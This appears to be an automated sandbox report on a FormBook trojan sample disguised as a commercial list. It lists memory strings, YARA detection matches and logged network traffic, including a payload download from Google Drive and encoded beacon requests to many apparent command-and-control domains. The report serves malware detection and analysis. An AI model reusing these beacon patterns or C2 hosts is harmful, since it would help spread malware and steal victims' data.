      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA14H4ei.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA14KvoM.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15lYnF.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cug2r.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eKcOs.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AALo3og.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAPwrS4.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATQvrt.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1g3BNv.img
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBJrII1.img
      Source: explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj.img
      Source: explorer.exe, 00000004.00000002.16303460985.00000000130BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16264541755.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11498070989.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620419539.000000000305A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11502862919.0000000003057000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: explorer.exe, 00000004.00000002.16292132140.000000000FCCE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000004.00000003.12984871283.000000000CDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000CDE3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wamiz.de/neuigkeiten/37247/frauen-auto-kamera-aussetzen
      Source: explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
      Source: explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000004.00000002.16281521340.000000000C9C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C9C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12986373278.000000000C9C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/ClassId
      Source: explorer.exe, 00000004.00000002.16292132140.000000000FCCE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11775176813.000000000FCCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11541326939.000000000FC79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comt.
      Source: explorer.exe, 00000004.00000003.12984871283.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000CE3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CE3B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11492678485.000000000305F000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11493328121.000000000305F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/auto/nachrichten/das-haben-sie-noch-nie-gesehen-roboter-jagt-falschparker/
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/nach-
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/wasserkraftwerk-selbst-gebaut-vietnamese-zeigt-in-14-
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/zahlreiche-deutsche-autos-auf-havarierter-fremantle-h
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/leben/keine-guten-ausssichen-4-sternzeichen-erwartet-ein-schwere
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/leben/mutter-l
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/liebe-beziehung/frauen-steigen-aus-dem-auto-was-sie-tun-ist-uner
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/lifestylegeneral/make-up-auf-dem-wacken-keiner-schert-sich-einen
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/bildergalerien/photo-of-the-day/ss-AA1ePdb4
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/other/donald-trumps-ex-berater-john-bolton-usa-werden-die-nato
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/kaufland-partnersuche-sorgt-f
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/neonazis-wollten-badeg
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/rettungshubschrauber-kollidiert-mit-baum-in-dresden/a
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/general-a-d-ben-hodges-warum-gebt-ihr-nicht-einfach-ni
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/stimmung-auf-dem-tiefpunkt-in-einem-600-seelen-dorf-en
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/ukraine-krieg-milit
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/wagner-bluff-lukaschenkos-experte-hat-prigoschin-these
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/zeitung-titelt-zerbrechende-freundschaft-jetzt-entzwei
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/angriff-auf-russischen-tanker-sig-soll-treibstoff-f
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/ecowas-plant-milit
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/reisen/nachrichten/passagier-hatte-vibration-bemerkt-lufthansa-flug-nach-m
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/coppa-italia
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/dfb-pokal
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/england
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/frankreich
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-women
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/spanien
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/uefa-europa-league
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalender
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalender
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/unterhaltung/news/herzogin-meghan-r
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/unterhaltung/other/c
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/wetter/topgeschichten/mega-sturm-kommt-meteorologe-warnt-darum-wird-es-leb
      Source: explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/de-de/feed
      Source: explorer.exe, 00000004.00000002.16303460985.00000000130BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16264541755.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com
      Source: explorer.exe, 00000004.00000002.16303460985.00000000130BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16264541755.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.namesilo.com/domain/search-domains?query=ngbjf.cyou
      Source: colorcpl.exe, 00000005.00000002.16264541755.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4ulvss7tcohtsfs7v3penv9eff/1692775725000/09097082265029608041/*/1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79?e=download&uuid=29b6be65-76dc-43bd-aef7-44538726e87d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-14-bk-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=h0bAtoVykYa/rrFkLV94YI4T4if6JB47wwwQdxj8azu213gVVwhSCjjiLgU+HyCgJrmv HTTP/1.1Host: www.aitechscope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYo HTTP/1.1Host: www.telefonino.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0X HTTP/1.1Host: www.zentrimax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=T6ZJsGSn7Xix6KaCNKUP+2dHlKNLLzmiVy8An9M+L4qtZR+McsZCzJePNx5gVfUlgzDb HTTP/1.1Host: www.luckymotherclucker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=SC/iCgFLVXNGeXCdvfSQQa0Pnk4CAUJ5O5Rqv1EukQPQaC7CZmx4daunLr1tFIMbtKb4&kxopsN=MlyXbd0X HTTP/1.1Host: www.nrodwukb.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1C HTTP/1.1Host: www.ballbucketssalesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X HTTP/1.1Host: www.pingpongtable-sg.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=+mA0FlUcSz8uL7OKJNWfW2ZlgbXAiWHV5u0VTdt0L7UZP0MWfugFcx8oc6pDvqcBHwu4&kxopsN=MlyXbd0X HTTP/1.1Host: www.shebyoaksmovie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=2RBP+VTnP5UsVlIy/ct1u57VujAPMLUq2SsmZdBI0t1ol65Yzj5vyA1Q7mc2+tYrW7QO&kxopsN=MlyXbd0X HTTP/1.1Host: www.mtotem.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=DQc+x29LPs0StMrMYSOxbo606Q5N7aX/d2tywja8NeaCrvmLZ/vuxhKObAknVg63SjuP&kxopsN=MlyXbd0X HTTP/1.1Host: www.ddh979.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=93iuEoE3ZAJchREJoff4c3+cnuBG7egDZRy7rY1Y8CjSiruBWemx2Azc3Gt8OJFb+t3B&1b_Pr=C88x5r HTTP/1.1Host: www.sfaiqhwxebvtre.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnsce HTTP/1.1Host: www.rtuakl.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=Mrfpj9Lscj+lGsorq1+NGtecW7+GotfegZgYdt6juanfgo0fmIEP17Z154I/86DF7ZrT&1b_Pr=C88x5r HTTP/1.1Host: www.r5fesgy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?1b_Pr=C88x5r&IpZXsVy=o9iJiepY7tbZK5GL3oPLoe4ACswWoGUScwmdQvzUuUD/DHdXMl0ph81Qbo3YWeK2S1M+ HTTP/1.1Host: www.lido.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /fg83/?IpZXsVy=AfWx5BM5NEDLLjiDiXzoNqwgCc8LDH2xQfiELIIrQmIg7de8Ug2fD1PTSOtTZsGWy/y0&1b_Pr=C88x5r HTTP/1.1Host: www.ngbjf.cyouConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49922 version: TLS 1.2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405086

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
